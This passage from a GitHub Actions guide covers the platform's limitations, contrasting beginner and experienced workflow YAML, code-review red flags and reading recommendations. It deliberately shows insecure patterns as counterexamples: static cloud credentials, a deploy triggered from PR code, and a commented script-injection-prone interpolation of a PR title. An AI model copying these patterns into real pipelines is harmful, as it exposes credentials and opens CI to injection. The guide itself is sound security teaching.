11.3 Cross-repo workflows are second-class citizens
Where it comes from: Mental Model 1. The repo is the trust boundary. Workflows that span repos require deliberate workarounds — fine-grained personal access tokens, GitHub App credentials, repository_dispatch events, or the new “GitHub App tokens for CI” pattern. None of these have first-class support in the workflow YAML.
What it costs you: Cross-repo orchestration (build artifact in repo A, deploy from repo B) requires identity plumbing that’s surprisingly painful. Monorepo gravity is real here — Actions silently incentivizes consolidation because multi-repo workflows fight the platform.
Dealbreaker when: Your architecture is multi-repo by design (microservices each in their own repo with central deploy pipelines, infra-as-code in a separate repo from app code). Expect to build a meaningful amount of glue. Some teams find themselves maintaining a small “orchestrator” GitHub App just to bridge this gap.
11.4 GitHub-hosted runners have hard, opaque performance limits
Where it comes from: Multi-tenancy. The standard ubuntu-latest runner (2 cores and 7 GB of RAM for private repos; public repos get 4 cores and 16 GB) is cheap, and free for public repos, precisely because it’s small. There’s no way to make a single job faster except by buying a larger runner SKU.
What it costs you: Builds that take 30 minutes on ubuntu-latest would take 8 minutes on a 16-core machine. You can pay for larger runners, but the per-minute price scales linearly while the speedup tapers — a 4x runner often only delivers 1.5-2x speedup on real workloads, so cost-per-build rises. The reported developer-time waste from slow CI is large; the platform’s pricing model makes it expensive to fix.
Dealbreaker when: You have CPU-heavy or memory-heavy builds (large monorepos, big test suites, container builds). At that point, self-hosted on dedicated hardware or a third-party fast-runner provider (Blacksmith, WarpBuild, Depot) starts paying for itself.
11.5 Self-hosted runner operations are an iceberg
Where it comes from: Self-hosted is “we give you a binary, you run it.” Everything else — image management, scaling, isolation, security, monitoring, networking, cache colocation — is yours.
What it costs you: A meaningful operational burden. Actions Runner Controller on EKS is the recommended path; it requires Kubernetes expertise, custom runner images (the official ARC image is intentionally minimal — you’ll spend a sprint installing the tools your jobs need), runner version bumps every release, careful job-to-pod sizing, and Docker Hub rate-limit mitigation. The community-supported “Summerwind” version of ARC is technically deprecated; the official version is missing some features still. Spot instances are tempting but not reliable enough for runners — interruptions mid-job are operationally messy.
Dealbreaker when: You’re a small team without platform-engineering depth. The Cloud Posse and GitHub Well-Architected guides on self-hosted runners exist for a reason: it’s hard to do well, and easy to do badly in a way that bites you for months.
11.6 YAML expressiveness ceiling
Where it comes from: The workflow language is YAML with a small expression syntax — no loops, no functions, no conditionals beyond if: strings, no real composition primitives. Compared to Jenkinsfiles (Groovy) or GitLab CI’s templating, Actions YAML is rigid.
What it costs you: Complex pipelines become piles of nearly-identical jobs distinguished only by inputs. The matrix strategy can do simple combinatorics but can’t express dynamic generation cleanly (the workaround is “have a job that emits a JSON matrix,” which is a pattern you’ll see in any sophisticated repo). Reusable workflows have meaningful syntactic limits — they can’t be called from a matrix context in older versions, can’t easily compose.
Dealbreaker when: Your pipelines are themselves complex software (release engineering with hundreds of artifacts, conditional release gates, multi-target builds). Teams hit this ceiling at scale and either build their own pipeline orchestrator on top (calling Actions as the runner) or migrate to something more expressive.
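The "job that emits a JSON matrix" workaround mentioned above looks roughly like this. It is a sketch under an assumed repo layout (one buildable package per directory under packages/, each with its own Makefile); the job and output names are illustrative.

```yaml
jobs:
  plan:
    runs-on: ubuntu-latest
    outputs:
      matrix: ${{ steps.gen.outputs.matrix }}
    steps:
      - uses: actions/checkout@v4
      - id: gen
        # Turn the directory listing into {"package":["a","b",...]} on one line.
        run: |
          MATRIX=$(ls packages | jq -R . | jq -sc '{package: .}')
          echo "matrix=$MATRIX" >> "$GITHUB_OUTPUT"
  build:
    needs: plan
    runs-on: ubuntu-latest
    strategy:
      matrix: ${{ fromJSON(needs.plan.outputs.matrix) }}
    steps:
      - uses: actions/checkout@v4
      - run: make -C "packages/$PACKAGE"
        env:
          PACKAGE: ${{ matrix.package }}
```

It works, but note what it takes: an extra job, a shell pipeline, and a JSON round trip to express what a loop would say in one line in a general-purpose language.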
11.7 The lock-in is total and silent
Where it comes from: Once your workflows live in .github/workflows/, your secrets in GitHub’s vault, your artifacts in GitHub’s storage, your OIDC trust relationships pointed at GitHub’s issuer, your release pipelines using softprops/action-gh-release, your registry tokens authenticated by GitHub Apps — you are deeply, structurally inside GitHub’s ecosystem. Migration to GitLab CI or Jenkins or anything else means rewriting all of this.
What it costs you: Optionality. You can no longer leave GitHub on a quarter’s notice. The migration is a multi-month project with real risk. This is GitHub’s moat, deliberately built. They are not subtle about it.
Dealbreaker when: You’re optimizing for portability or you’re in an industry where GitHub-the-company being a single vendor is an unacceptable risk. (Some regulated industries treat this as an actual concern.)
11.8 Debugging is genuinely worse than local dev
Where it comes from: The runner is ephemeral. Logs are streamed but the environment dies. Reproducing a CI failure locally requires either (a) act, with imperfect emulation, or (b) tmate to SSH in mid-job, which is fragile.
What it costs you: Time. The “push, wait 3 minutes, see failure, push again” loop is the single most frustrating thing about CI in general and Actions in particular. The OIDC and context system is intricate enough that “works locally / fails in CI” debugging takes a lot of echo-based archaeology.
Dealbreaker when: Never quite a dealbreaker — but a chronic productivity tax that compounds over a team’s lifetime.
11.9 macOS and Windows runners are expensive and slow
Where it comes from: Apple licensing and Microsoft’s pricing for Windows in cloud environments. macOS runners are roughly 10x the price per minute of Linux runners.
What it costs you: iOS and Mac development on Actions is meaningfully expensive at scale. Some teams maintain Mac mini farms because GitHub-hosted macOS runners are uneconomical above a certain volume.
Dealbreaker when: You’re an iOS-heavy shop or a cross-platform shop where Windows/macOS is in the critical path. Look at specialized providers (MacStadium, Blacksmith, others) before defaulting to GitHub-hosted.
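If macOS is not in the critical path of every change, one common mitigation is to keep it off the PR loop. A hedged sketch, assuming a project whose tests run with a hypothetical make test target: Linux runs on every PR, macOS only on pushes to main.

```yaml
# Sketch only: "make test" is a placeholder for your real test command.
name: CI
on:
  push:
    branches: [main]
  pull_request:
permissions:
  contents: read
jobs:
  test-linux:
    runs-on: ubuntu-latest
    timeout-minutes: 15
    steps:
      - uses: actions/checkout@v4
      - run: make test
  test-macos:
    # Skipped on pull_request events, so PR iterations never bill macOS minutes.
    if: github.event_name == 'push'
    runs-on: macos-latest
    timeout-minutes: 30
    steps:
      - uses: actions/checkout@v4
      - run: make test
```

The trade-off is that macOS-only breakage surfaces after merge rather than before, which is acceptable only when such breakage is rare.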
11.10 Rate limits and cache eviction are silent productivity killers
Where it comes from: Cache: 10 GB per repo, 7-day eviction on no access. Cache upload: 200/min/repo. Download: 1500/min/repo. API rate limits on the GITHUB_TOKEN. Runner concurrency limits per account. None of these are usually a problem until they suddenly are, often during an incident or a release crunch.
What it costs you: Time spent debugging “why is my cache not working” or “why are my workflows queueing” only to realize you hit a quota.
Dealbreaker when: Almost never — but every team eventually has a “we hit a limit we didn’t know existed” outage. The mitigation is documenting limits in your runbook and monitoring proximity to them.
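Part of the mitigation can live in the workflow itself: make cache misses visible instead of silent. A minimal sketch, assuming an npm project; the step id and the warning text are illustrative. It uses the cache-hit output of actions/cache, which is 'true' only on an exact key match.

```yaml
# Sketch only: paths and key prefix assume an npm project.
name: CI
on: pull_request
permissions:
  contents: read
jobs:
  test:
    runs-on: ubuntu-latest
    timeout-minutes: 15
    steps:
      - uses: actions/checkout@v4
      - name: Restore npm cache
        id: npm-cache
        uses: actions/cache@v4
        with:
          path: ~/.npm
          # Exact key changes whenever the lockfile changes.
          key: npm-${{ runner.os }}-${{ hashFiles('**/package-lock.json') }}
          # Fallback prefix: reuse the most recent cache for this OS.
          restore-keys: |
            npm-${{ runner.os }}-
      - name: Flag cache misses
        if: steps.npm-cache.outputs.cache-hit != 'true'
        run: echo "::warning::npm cache miss or partial restore; check cache size and eviction"
      - run: npm ci
      - run: npm test
```

A sudden run of warnings across unrelated PRs is a reasonable signal that the repo has hit its cache quota or that entries are being evicted.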
12. The Taste Test
What separates a workflow that an experienced engineer would respect from one that screams “wrote this by copy-pasting.”
Workflow YAML that reveals taste
beginner: overstuffed, copy-pasted, no permissions block, actions pinned to mutable refs:
name: Tests
on: [push, pull_request]
jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@main # mutable branch ref: BAD
      - uses: actions/setup-node@v3 # outdated
      - run: npm install
      - run: npm test
      - uses: peter-evans/create-pull-request@v4
      - uses: aws-actions/configure-aws-credentials@v1
        with:
          aws-access-key-id: ${{ secrets.AWS_KEY_ID }} # static creds: BAD
          aws-secret-access-key: ${{ secrets.AWS_SECRET }}
      - run: aws s3 sync dist/ s3://prod-bucket # deploy from PR: BAD
experienced: focused, explicit permissions, pinned actions, concurrency control, a job timeout (OIDC and gated deploys live in a separate workflow):
name: CI
on:
  push:
    branches: [main]
  pull_request:
permissions:
  contents: read
concurrency:
  group: ci-${{ github.workflow }}-${{ github.ref }}
  cancel-in-progress: true
jobs:
  test:
    runs-on: ubuntu-latest
    timeout-minutes: 15
    steps:
      - uses: actions/checkout@v4
      - uses: actions/setup-node@v4
        with:
          node-version: '20'
          cache: 'npm'
      - run: npm ci
      - run: npm test
The experienced version doesn’t try to do everything in one workflow. Deploys live in a separate workflow, gated by an environment with manual approval, using OIDC for cloud auth.
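A separate deploy workflow along those lines might look like the sketch below. It assumes AWS, an environment named production configured in the repository settings with required reviewers, and an IAM role that trusts GitHub’s OIDC issuer. The role ARN, region, bucket name, and build commands are placeholders, not values from this guide.

```yaml
# Sketch only: ARN, region, bucket, and build commands are hypothetical.
name: Deploy prod
on:
  workflow_dispatch:
permissions:
  contents: read
  id-token: write   # required so the job can request an OIDC token
concurrency:
  group: deploy-prod
  cancel-in-progress: false   # never cancel a deploy halfway through
jobs:
  deploy:
    runs-on: ubuntu-latest
    timeout-minutes: 20
    # The job waits here until the environment's protection rules pass.
    environment: production
    steps:
      - uses: actions/checkout@v4
      - uses: actions/setup-node@v4
        with:
          node-version: '20'
          cache: 'npm'
      - run: npm ci
      - run: npm run build
      - uses: aws-actions/configure-aws-credentials@v4
        with:
          role-to-assume: arn:aws:iam::123456789012:role/example-deploy-role
          aws-region: us-east-1
      - run: aws s3 sync dist/ s3://example-prod-bucket
```

No long-lived cloud secret appears anywhere in the file; the only credential is the short-lived one exchanged for the OIDC token after the approval gate.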
Composite action that reveals taste
beginner: no shell on the run steps (composite actions require one on every run step), no inputs, no outputs:
runs:
  using: composite
  steps:
    - run: npm ci
    - run: npm run build
experienced: explicit shell, parameterized, surfaces useful outputs:
name: 'Build app'
description: 'Install deps and build, with caching'
inputs:
  node-version:
    description: 'Node version'
    default: '20'
outputs:
  build-time:
    description: 'Time taken to build, in seconds'
    value: ${{ steps.build.outputs.duration }}
runs:
  using: composite
  steps:
    - uses: actions/setup-node@v4
      with:
        node-version: ${{ inputs.node-version }}
        cache: npm
    - run: npm ci
      shell: bash
    - id: build
      run: |
        START=$(date +%s)
        npm run build
        echo "duration=$(($(date +%s) - START))" >> "$GITHUB_OUTPUT"
      shell: bash
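For completeness, here is how a workflow might consume a composite action like the experienced one above. This is a sketch that assumes the action is saved at the hypothetical path .github/actions/build/action.yml; the job and step names are illustrative.

```yaml
# Sketch only: the action path and step ids are assumptions.
name: Build
on: pull_request
permissions:
  contents: read
jobs:
  build:
    runs-on: ubuntu-latest
    timeout-minutes: 15
    steps:
      # A local action is only available after the repo is checked out.
      - uses: actions/checkout@v4
      - id: app
        uses: ./.github/actions/build
        with:
          node-version: '22'
      - name: Report build time
        env:
          BUILD_TIME: ${{ steps.app.outputs.build-time }}
        run: echo "Build took ${BUILD_TIME}s"
```

The caller sees one input and one output; the caching and timing details stay inside the action, which is the point of parameterizing it.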
Repository structure that reveals taste
.github/
├── workflows/
│ ├── ci.yml # tests on every PR
│ ├── deploy-staging.yml # auto on merge to main
│ ├── deploy-prod.yml # gated by environment
│ ├── release.yml # on tag push
│ └── nightly.yml # cron-based heavy tests
├── actions/
│ ├── setup/ # composite: shared setup
│ └── deploy/ # composite: shared deploy logic
├── CODEOWNERS # gates changes to .github/
└── dependabot.yml # action version updates
What this signals: workflows have single responsibilities, shared logic is factored out, action updates are automated, changes to the CI itself are reviewed (CODEOWNERS on .github/).
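The dependabot.yml in that tree can be very small. A minimal sketch, assuming weekly updates are acceptable; the cooldown block is an assumption about your setup, since cooldown support varies by ecosystem and should be checked against the Dependabot options reference.

```yaml
# .github/dependabot.yml (sketch; interval and cooldown values are illustrative)
version: 2
updates:
  - package-ecosystem: "github-actions"
    directory: "/"          # Dependabot looks in .github/workflows from here
    schedule:
      interval: "weekly"
    # Assumption: wait a few days before proposing a freshly published version.
    cooldown:
      default-days: 7
```

Paired with a CODEOWNERS entry covering .github/, every action bump arrives as a PR that the owners of the CI configuration must approve.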
Other red flags in code review
- pull_request_target anywhere: pause and demand justification.
- Direct interpolation of github.event.* into run: blocks, which is script injection.
- ${{ secrets.X }} referenced in a workflow that runs on pull_request: it won’t work for forks anyway, but it signals confusion about the trust model.
- actions/checkout with persist-credentials: true (the default) before a step that downloads from the internet, because credentials leak through .git/config.
- A missing permissions: block, which means relying on the org default, which may be permissive.
- continue-on-error: true on a security-relevant step, which silently passes failures.
- Self-hosted runner labels on public repos: RCE oracle (see Section 7.6).
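Two of these red flags have mechanical fixes. The sketch below, with illustrative job and step names, passes an attacker-controlled field through an environment variable instead of interpolating it into the script, and turns off credential persistence at checkout.

```yaml
# Sketch only: job and step names are illustrative.
name: PR checks
on: pull_request
permissions:
  contents: read
jobs:
  lint-title:
    runs-on: ubuntu-latest
    timeout-minutes: 5
    steps:
      - uses: actions/checkout@v4
        with:
          # Do not leave the token in .git/config for later steps to read.
          persist-credentials: false
      - name: Check PR title
        env:
          # The expression is expanded into the environment, not into the script.
          PR_TITLE: ${{ github.event.pull_request.title }}
        run: |
          # Unsafe form, for contrast: echo "${{ github.event.pull_request.title }}"
          printf 'PR title: %s\n' "$PR_TITLE"
```

The difference is where substitution happens: in the unsafe form the title becomes part of the script text before the shell ever runs, so a title containing shell syntax is executed; in the safe form the shell only ever sees a variable reference.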
Other green flags
- timeout-minutes: on every job, as a defense against hangs.
- A concurrency: block on PR workflows with cancel-in-progress: true, which is cost-conscious.
- OIDC instead of stored cloud secrets: modern security posture.
- Reusable workflows centralized in a templates repo: at-scale thinking.
- Renovate/Dependabot keeping action SHAs current with cooldown: supply chain hygiene.
- Workflow runs that emit $GITHUB_STEP_SUMMARY: care for the operator.
- actionlint and zizmor running on the workflows themselves: meta.
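As one concrete instance of the step-summary green flag, a job can append a few lines of Markdown to the file named by $GITHUB_STEP_SUMMARY. A minimal sketch, assuming an npm project; the headings and fields are illustrative.

```yaml
# Sketch only: summary contents and build commands are assumptions.
name: CI
on: pull_request
permissions:
  contents: read
jobs:
  test:
    runs-on: ubuntu-latest
    timeout-minutes: 15
    steps:
      - uses: actions/checkout@v4
      - run: npm ci
      - run: npm test
      - name: Write job summary
        # always() so the summary is written even when tests fail.
        if: always()
        env:
          JOB_STATUS: ${{ job.status }}
        run: |
          {
            echo "### Test run"
            echo ""
            echo "- Commit: ${GITHUB_SHA}"
            echo "- Status: ${JOB_STATUS}"
          } >> "$GITHUB_STEP_SUMMARY"
```

The summary renders on the run page, so whoever is on call can see the outcome without opening the raw logs.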
13. Where to Go Deeper
A small number of resources worth your time.
The official docs at docs.github.com/en/actions. Surprisingly well-written, particularly the Concepts, Security, and Reference sections. The “Events that trigger workflows” page is canonical and worth reading once cover-to-cover.
GitHub Security Lab’s “Keeping your GitHub Actions and workflows secure” series (4 parts, on securitylab.github.com). Mandatory reading if you’re maintaining open source or operating Actions in any production-relevant way. The pwn-request and TOCTOU posts are the canonical references for the dangerous-event class of bugs.
actionlint (rhysd/actionlint) and zizmor (woodruffw/zizmor). Run both. Treat warnings as errors. actionlint catches typos and structural mistakes; zizmor catches security anti-patterns.
The Actions Runner Controller docs (docs.github.com/en/actions/concepts/runners/actions-runner-controller) and the GitHub Well-Architected library (wellarchitected.github.com). Mandatory before deploying self-hosted runners at scale. Some-Natalie’s blog (some-natalie.dev) has the most honest practical writing on self-hosted Actions in production.
Adnan Khan’s research blog and the Orca Security “pull_request nightmare” posts. The state of the art in attacking Actions in the wild. Read at least one to recalibrate your sense of how exposed real-world workflows are.
actions/starter-workflows. GitHub’s official template repo. Useful as a starting point and as a reference for what GitHub itself considers idiomatic.
The nektos/act README and Wiki. For local testing. Not perfect, but indispensable when you’re debugging workflow YAML.
The aws-actions/configure-aws-credentials README. The OIDC-with-AWS guide is unusually clear, and the patterns generalize to GCP and Azure (whose own auth-action READMEs are also worth reading).
Stop there. The marginal value of more “GitHub Actions tutorial” content drops to zero quickly; everything beyond this list is repetition.
14. The Final Verdict
GitHub Actions is the platform that finally made CI/CD feel like part of the source code rather than a parallel system bolted on. That’s a genuine, durable accomplishment. The cost is that the system encodes GitHub’s idea of how a software team should work — repo-centric, trunk-based, marketplace-augmented — and resists every other shape.
What it gets profoundly right:
- Putting workflows in the repo, where they belong. Code review for CI changes, atomic rollbacks, branch-based experimentation: these were missing from CI/CD for two decades and Actions made them the default.
- The OIDC token model. “No long-lived secrets” was a security pipe dream until Actions and the cloud providers built trust federation that just works. Everyone else now has to copy this; GitHub got there first because they could iterate the issuer and the consumer (cloud providers) and the runner together.
- The marketplace. A million pieces of automation glue, free and shareable. The economic value of aws-actions/configure-aws-credentials existing, versus everyone rolling their own, is enormous.
What it gets wrong, and what it costs you:
- The pull_request_target design. This was a footgun on day one and remains one years later. Hundreds of CVEs trace to it.
- The expression-substitution-before-shell architecture. Permanent. Architectural. Every workflow needs human review for injection forever.
- Self-hosted as second-class. GitHub’s heart is in the hosted experience. Self-hosted is supported but it’s clearly not the path GitHub wants you on, and the operational burden reflects that.
- The lock-in. This is not subtle. Once you’re in, leaving costs months. That is the deal you sign.
Who should reach for this and who shouldn’t: Reach for it if your code is on GitHub, your team is small-to-medium, your build is not pathologically slow, and your security posture can absorb the supply-chain attack surface (or you’re willing to do the SHA-pinning work). For most teams in 2026 starting from scratch, this is the obvious default. Don’t reach for it if you’re cross-VCS, if you’re in a regulated air-gapped environment (where GitHub Enterprise Server or Jenkins still wins), if your pipeline is itself a complex piece of software (where Jenkinsfile’s Groovy or GitLab CI’s includes give you real composition), or if you genuinely need the deepest possible control — Jenkins is still Jenkins, and there are scenarios where its 1,800-plugin Cambrian explosion of capability is the right answer.
What you should now believe:
- Workflows live in the repo. The repo is the trust boundary. Most surprises come from forgetting this.
- OIDC has eaten static secrets and you should adopt it everywhere it’s supported. The argument is over.
- Marketplace actions are dependencies. Treat them as such — pin, audit, cooldown, contain.
- pull_request_target is named like a normal feature and behaves like a loaded gun. Don’t use it to build PR code, ever.
- The platform’s strengths are repo-tight integration and ecosystem reach. Its weaknesses are cross-repo orchestration, self-hosted operations, and supply-chain hygiene. Plan accordingly.
The hard-won line: GitHub Actions is what happens when you take CI/CD seriously as a feature of source control rather than as a separate product. That’s its genius and its limitation. Use it where that frame fits the work; use something else where it doesn’t; and recognize that the one architectural decision — repo-as-source-of-truth — is doing 90% of the work in both columns.
The ideas are mine. The writing is AI-assisted.